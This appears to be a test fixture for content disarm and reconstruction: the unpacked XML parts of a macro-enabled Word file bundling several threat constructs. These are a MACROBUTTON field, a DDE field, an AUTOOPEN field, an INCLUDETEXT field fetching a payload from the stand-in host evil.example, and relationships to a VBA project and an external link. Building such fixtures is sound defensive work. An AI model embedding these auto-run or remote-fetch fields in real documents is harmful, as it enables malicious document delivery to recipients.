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ms-word.document.macroEnabled.main+xml"/>
</Types>
</file>

<file path=_rels/.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"></Relationships>
</file>

<file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body>
    <w:p>
      <w:r>
        <w:t>CDR Test: Multi-Threat Document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:fldSimple w:instr=" MACROBUTTON HiddenButton Click ">
        <w:r>
          <w:t>run macro</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText> DDE EXCEL Sheet1!R1C1 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>dde result</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:fldSimple w:instr=" AUTOOPEN auto_run ">
        <w:r>
          <w:t>auto</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
    <w:p>
      <w:fldSimple w:instr=" INCLUDETEXT &quot;http://evil.example/payload.docx&quot; ">
        <w:r>
          <w:t>remote content</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink1.xml"/></Relationships>
</file>

<file path=word/externalLinks/externalLink1.xml><?xml version="1.0" encoding="utf-8"?>
<externalLink xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"/>
</file>